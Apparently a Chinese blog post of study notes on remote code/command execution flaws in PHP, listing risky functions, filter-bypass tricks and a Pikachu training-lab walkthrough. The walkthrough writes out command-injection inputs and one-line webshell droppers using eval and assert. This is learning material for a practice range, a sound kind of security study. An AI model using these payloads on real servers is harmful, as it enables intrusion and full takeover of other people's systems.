RCE漏洞学习

目录

一、概述

二、常见的漏洞函数

三、RCE绕过

四、Pikachu靶场练习

一、概述

        RCE漏洞,即远程代码执行和远程命令执行漏洞。这种漏洞允许攻击者在后台服务器上远程注入操作系统命令、代码,从而控制后台系统。

        产生RCE漏洞的根本原因在于,服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。或者在Web应用中开发者为了灵活性,简洁性等会让应用调用代码或者系统命令执行函数去处理,同时没有考虑用户的输入是否可以被控制,造成代码/系统命令执行漏洞。 

二、常见的漏洞函数

1.system():执行外部程序,并且显示输出

<?php
system("whoami");

2.exec():执行一个外部程序

<?php
$output=null;
$retval=null;
exec('whoami', $output, $retval);
echo "Returned with status $retval and output:\n";
print_r($output);

3.shell_exec():通过 shell 执行命令并将完整的输出以字符串的方式返回

<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";

4.passthru():执行外部程序并且显示原始输出

<?php
passthru("ipconfig");

三、RCE绕过

1.管道符

2.空格过滤

3.\绕过

c\at /flag
l\s /

4.正则匹配绕过

cat /f???
cat /fl*
cat /f[a-z]{2}

四、Pikachu靶场练习

1.exec "ping"

提供了一个PING接口,用于执行PING命令

“|”在windows中的意思是:把前面的结果当成后面的输入

直接获取webshell

?cmd=echo “<?php @eval($_REQUEST[q]); ?>” > C:\phpstudy\PHPTutorial\WWW\webshell.php

显示当前路径

?cmd=cd

使用127.0.0.1 & ipconfig攻击

写入文件

?cmd=echo "?php phpinfo(); ?>" > C:\Users\HP\Desktop\shell.php

2.exec "eval"

这里输入想要执行的php代码即可
输入phpinfo();后回显在页面上

创建一个shell.php的文件,在该文件中写入一句话木马:

fputs(fopen('shell.php','w'),'<?php assert($_POST[s]);?>');

可以观察靶场的源代码,得知这里没有对用户的输入进行校验,也就是说,直接将用户的输入当作PHP代码执行

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值